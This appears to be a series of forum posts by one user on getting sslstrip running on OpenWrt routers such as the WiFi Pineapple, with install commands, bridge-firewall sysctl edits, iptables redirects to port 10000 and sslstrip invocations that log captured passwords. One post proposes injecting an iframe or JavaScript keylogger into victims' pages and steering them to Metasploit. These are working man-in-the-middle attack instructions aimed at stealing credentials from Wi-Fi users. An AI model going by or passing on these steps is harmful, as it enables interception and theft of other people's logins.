thaihenry

For anyone interested, I got sslstrip .9 working by remarking the following lines so that the deprecate module is not requried: nano /opt/usr/lib/python2.7/site-packages/twisted/web/__init__.py # -*- test-case-name: twisted.web.test -*- # Copyright © Twisted Matrix Laboratories. # See LICENSE for details. """ Twisted Web: a L{web server} (including an L{HTTP implementation} and a L{resource model}) and a L{web client}. """ from twisted.web._version import version from twisted.python.versions import Version #from twisted.python.deprecate import deprecatedModuleAttribute __version__ = version.short() #deprecatedModuleAttribute( # Version('Twisted', 11, 1, 0), # "Google module is deprecated. Use Google's API instead", # __name__, "google")

I don't think it is a problem with sslstrip, although updating to version 8 helps The main problem is that bridging is not turned on. To turn it on: vi /etc/sysctl.conf Change to: # disable bridge firewalling by default net.bridge.bridge-nf-call-arptables=1 net.bridge.bridge-nf-call-ip6tables=1 net.bridge.bridge-nf-call-iptables=1 Should only be one IP redirect: iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 ssltrip is a proxy which means that you ca do all kinds of things with it besides getting passwrds.!!!

Interesting, I definitely have it working on my wr703n with the latest version of openwrt (development). I am pretty sure I had it working on the Mark4 also. Did you reboot? I wonder if there are different versions of the firmware? Is your linux version 3.3?

Yes that is correct, I have not done much testing on it otherwise. You just need to manually install the prerequisites as having SET install them for you will not work. Also have quite a few other python tools working great like mitmproxy

See my earlier post on this. By default iptables does not work on a bridge interface for openwrt. see my earlier post on sslstrip on how to fix that. Frankly I don't see how anyone can get sslstrip working on the Jasager without this fix.

urlsnarf listens only on port 80 and 8080. Once you start sslstrip, traffic is redirected to port 10000 by default, so urlsnarf does not see any traffic. I have not tried it, but get sslstrip to run on port 8080, urlsnarf may then pick up the traffic.

In case you cannot exchange them, keep in mind that as long as you are running openwrt, there is still a lot that you can do with the boards. Most of the utilities will run fine from the command line, however you will not get the pineapple firmware (interface) on it. I would be interested to know if 16 Megs memory is enough to run SSLstrip properly though.

Instead of using ettercap, (the filters don't work properly) use sslstrip to write an iframe in the response body. If you provide me with your java script code, I can modify sslstrip for you to do that, so that your sslstrip module will also do key logging! This can also be taken further to do all kinds of things like for example sending users to a computer running metasploit, set etc. while you are at it might as well do a SET module since I have SET working on my router.

For existing users of the Pineapple that want to get sslstrip working properly: 1. edit /etc/sysctl.conf (otherwise port redirect to port 10000 will not work!) change the 0 to 1 in the following section: vi /etc/sysctl.conf # disable bridge firewalling by default net.bridge.bridge-nf-call-arptables=1 net.bridge.bridge-nf-call-ip6tables=1 net.bridge.bridge-nf-call-iptables=1 2. Depending on what version you have make sure that the firewall is disabled. 3. Install the following packages in case they were never installed: opkg -dest usb install python opkg -dest usb install zope-interface opkg -dest usb install twisted-web opkg -dest usb install pyopenssl If you want to get the latest version of sslstrip: 4. Download sslstrip: wget http://www.thoughtcr...trip-0.6.tar.gz tar zxvf sslstrip-0.6.tar.gz cd sslstrip-0.6 5. Fixes to get sslstrip working properly: ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7 touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py 6. If you are using the sslstrip module then you will need to install sslstrip: python setup.py install otherwise you can just run it from the command line: iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 python sslstrip.py -a -k -f -w /usb/log.txt

To answer my own post and get the latest version of sslstrip (v.9) working: Comment out lines 97 and line 98 of ServerConnection.py in the sslstrip sub-folder. # elif (key.lower() == 'set-cookie'): # self.client.responseHeaders.addRawHeader(key, value) However I have tested vesions 6-9 of sslstrip, while version 8 and 9 work, there is a problem (only on openwrt) that prevents the web page being loaded after passwords have been captured. most likely because "Compatibility changes for recent versions of twisted" Which means that twisted is not the latest version on openwrt. Versions 6-7 work fine. Also killsessions that never worked properly for me on versions 8 and 9 does seem to work good on 6 and 7!

This is a guide on how to get sslstrip working on openwrt. This should work on ANY router that supports openwrt with USB ports and 32 MB of memory or more. A fast CPU would help, however sslstrip runs fine on 400 mgz CPU. I have tested this on the pineapple mark 4 and on the tplink WR703N 1. Make sure you install a firmware with a version 3.0 or greater kernel. At this time only the development snapshots (firmware) of openwrt have linux 3.3 iptables may not be properly supported on earlier versions. 2. Install USB support, this is very well documented elsewhere on this site 3. edit /etc/profile vi /etc/profile a. Change the existing path statement to the following: export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/opt/bin:/opt/sbin:/opt/usr/bin:/opt/usr/sbin b. Add this line: export LD_LIBRARY_PATH=/lib:/usr/lib:/opt/lib:/opt/usr/lib 4. edit /etc/sysctl.conf (otherwise port redirect to port 10000 will not work!) change the 0 to 1 in the following section: vi /etc/sysctl.conf # disable bridge firewalling by default net.bridge.bridge-nf-call-arptables=1 net.bridge.bridge-nf-call-ip6tables=1 net.bridge.bridge-nf-call-iptables=1 5. Disable the firewall using the command line or web interface. (or modify iptables for proper routing) 6. Install the following packages: opkg -dest usb install python opkg -dest usb install zope-interface opkg -dest usb install twisted-web opkg -dest usb install pyopenssl Optional but very usefull: opkg -dest usb install nano opkg -dest usb install screen -dest usb may be different on your router depending on how you setup your usb disk and swap. Don't forget to add dest usb /usb in your software configuration. 7 Download sslstrip: wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz tar zxvf sslstrip-0.6.tar.gz cd sslstrip-0.6 8. Fixes to get sslstrip working properly: ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7 touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py Optional for nano and screen: ln -s /usb/usr/share/terminfo /usr/share/terminfo 9. to get sslstrip running: iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 python sslstrip.py -a -k -f -w /usb/log.txt Once you have everything working properly, you can install sslstrip as usual (python setup.py install) so that you can use your favorite scripts on openwrt.

Just in case someone can take this further, this is the error message when running version 9 after a few seconds: sslstrip 0.9 by Moxie Marlinspike running... Traceback (most recent call last): File "/opt/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/opt/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/opt/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/opt/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/opt/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite why = getattr(selectable, method)() File "/opt/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead return self.protocol.dataReceived(data) File "/opt/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived why = self.lineReceived(line) File "/opt/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived self.handleHeader(key, val) File "/usb/sslstrip-0.9/sslstrip/ServerConnection.py", line 98, in handleHeader self.client.responseHeaders.addRawHeader(key, value) exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'

According to moxie, these are the changes that he made: Changes in 0.8 (04/24/11) Major speed enhancements. Compatibility changes for recent versions of twisted. Support for stripping URLs with explicit port specifications (ie: foo.com:443) A number of small bug fixes. Changes in 0.7 (12/18/09) Fixed a minor bug that could prevent favicon spoofing from working correctly (thanks Simon Nicolussi). Changes in 0.6 (9/22/09) Fixed a silly bug in specifing the listen port with -l Here is how to get is working: cd /usb wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz tar xfv ssl* cd ssl* You can either run sslstrip version 8 directly or you can install it in the system. to run without installing: iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000 python sslstrip.py -k -f -w /usb/sslstrip.log I like to use screen so that I can run sslstrip in one screen and then see the output in other: tail /usb/sslstrip.log -f to install sslstrip: python setup.py install

sslstrip version 8 is running perfect on openwrt there is a problem with the latest version 9 off sslstrip: root@OpenWrt:/usb/sslstrip-0.9# python sslstrip.py Traceback (most recent call last): File "sslstrip.py", line 27, in <module> from twisted.web import http File "/opt/usr/lib/python2.7/site-packages/twisted/web/__init__.py", line 14, in <module> from twisted.python.deprecate import deprecatedModuleAttribute ImportError: No module named deprecate I tried installing the zope.deprecate module with no luck.

I think I found a solution but I need others to also test this. By default iptables does not work on the bridge interface br-lan. it is turned off and any redirect command will have no effect. https://forum.openwrt.org/viewtopic.php?pid=143700#p143700 I have edited /etc/sysctl.conf: # disable bridge firewalling by default net.bridge.bridge-nf-call-arptables=1 net.bridge.bridge-nf-call-ip6tables=1 net.bridge.bridge-nf-call-iptables=1 and redirect to port 10000 now works properly iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000 on the pineapple I believe the firewall is turned off, if you are using other versions of openwrt you will need to turn off the firewall (or modify the rules) so that traffic gets properly routed to the internet.